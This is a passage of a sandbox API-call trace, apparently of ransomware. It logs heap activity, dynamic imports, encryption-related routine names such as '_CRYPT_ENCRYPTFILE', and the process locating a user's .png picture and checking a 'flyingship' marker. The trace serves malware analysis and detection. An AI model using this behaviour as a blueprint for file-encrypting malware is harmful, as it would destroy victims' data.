hHeap=0x8a0000) returned 1 [0191.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0191.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0191.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0191.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0191.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0191.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0191.110] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0191.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0191.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0191.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0191.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0191.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0191.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0191.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0191.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0191.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0191.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0191.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0191.110] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0191.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0191.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0191.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0191.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0191.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0191.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0191.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0191.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0191.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0191.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0191.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0191.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0191.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0191.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0191.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0191.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0191.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0191.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0191.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0191.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0191.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0191.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0191.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0191.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0191.111] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0191.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0191.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0191.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0191.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0191.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0191.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0191.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0191.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0191.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0191.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0191.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0191.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0191.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0191.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0191.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0191.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0191.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0191.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0191.112] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0191.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0191.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0191.112] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0191.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8b8 [0191.112] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd8b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0191.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0191.112] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0191.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0191.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0191.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0191.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0191.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0191.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0191.112] CloseHandle (hObject=0x158) returned 1 [0191.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0191.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0191.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0191.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0191.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0191.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0191.113] FreeLibrary (hLibModule=0x75990000) returned 1 [0191.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0191.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0191.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0191.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0191.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0191.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0191.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0191.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0191.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0191.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0191.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0191.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0191.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0191.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0191.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0191.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0191.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0191.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0191.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0191.113] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0191.113] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0191.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0191.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0191.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0191.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0191.113] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0191.114] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0191.114] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.114] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0191.114] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0191.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0191.114] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.114] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.114] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.140] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ITYvcRMYOFcy 0-.png", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd54bd6e0, ftCreationTime.dwHighDateTime=0x1d5dc96, ftLastAccessTime.dwLowDateTime=0x4b84be50, ftLastAccessTime.dwHighDateTime=0x1d5d858, ftLastWriteTime.dwLowDateTime=0x4b84be50, ftLastWriteTime.dwHighDateTime=0x1d5d858, nFileSizeHigh=0x0, nFileSizeLow=0x158e9, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="ITYvcRMYOFcy 0-.png", cAlternateFileName="ITYVCR~1.PNG")) returned 0x90add8 [0191.140] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0191.140] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.140] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ITYvcRMYOFcy 0-.png", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd54bd6e0, ftCreationTime.dwHighDateTime=0x1d5dc96, ftLastAccessTime.dwLowDateTime=0x4b84be50, ftLastAccessTime.dwHighDateTime=0x1d5d858, ftLastWriteTime.dwLowDateTime=0x4b84be50, ftLastWriteTime.dwHighDateTime=0x1d5d858, nFileSizeHigh=0x0, nFileSizeLow=0x158e9, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="ITYvcRMYOFcy 0-.png", cAlternateFileName="ITYVCR~1.PNG")) returned 0x90add8 [0191.141] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0191.141] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ITYvcRMYOFcy 0-.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ITYvcRMYOFcy 0-.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ITYvcRMYOFcy 0-.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ITYvcRMYOFcy 0-.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ITYvcRMYOFcy 0-.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\ITYvcRMYOFcy 0-.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\ITYvcRMYOFcy 0-.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\ITYvcRMYOFcy 0-.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\ITYvcRMYOFcy 0-.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\ITYvcRMYOFcy 0-.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\ITYvcRMYOFcy 0-.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\ITYvcRMYOFcy 0-.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\ITYvcRMYOFcy 0-.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\ITYvcRMYOFcy 0-.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\ITYvcRMYOFcy 0-.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\ITYvcRMYOFcy 0-.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\ITYvcRMYOFcy 0-.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\ITYvcRMYOFcy 0-.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\ITYvcRMYOFcy 0-.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\ITYvcRMYOFcy 0-.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\ITYvcRMYOFcy 0-.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\ITYvcRMYOFcy 0-.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\ITYvcRMYOFcy 0-.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\ITYvcRMYOFcy 0-.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\ITYvcRMYOFcy 0-.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\ITYvcRMYOFcy 0-.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\ITYvcRMYOFcy 0-.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\ITYvcRMYOFcy 0-.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\ITYvcRMYOFcy 0-.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\ITYvcRMYOFcy 0-.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\ITYvcRMYOFcy 0-.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\ITYvcRMYOFcy 0-.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\ITYvcRMYOFcy 0-.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\ITYvcRMYOFcy 0-.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\ITYvcRMYOFcy 0-.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\ITYvcRMYOFcy 0-.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\ITYvcRMYOFcy 0-.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\ITYvcRMYOFcy 0-.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\ITYvcRMYOFcy 0-.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ITYvcRMYOFcy 0-.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ITYvcRMYOFcy 0-.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TYvcRMYOFcy 0-.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YvcRMYOFcy 0-.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vcRMYOFcy 0-.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cRMYOFcy 0-.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RMYOFcy 0-.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MYOFcy 0-.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YOFcy 0-.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OFcy 0-.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Fcy 0-.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cy 0-.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.143] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.143] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0191.143] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0191.143] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0191.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, 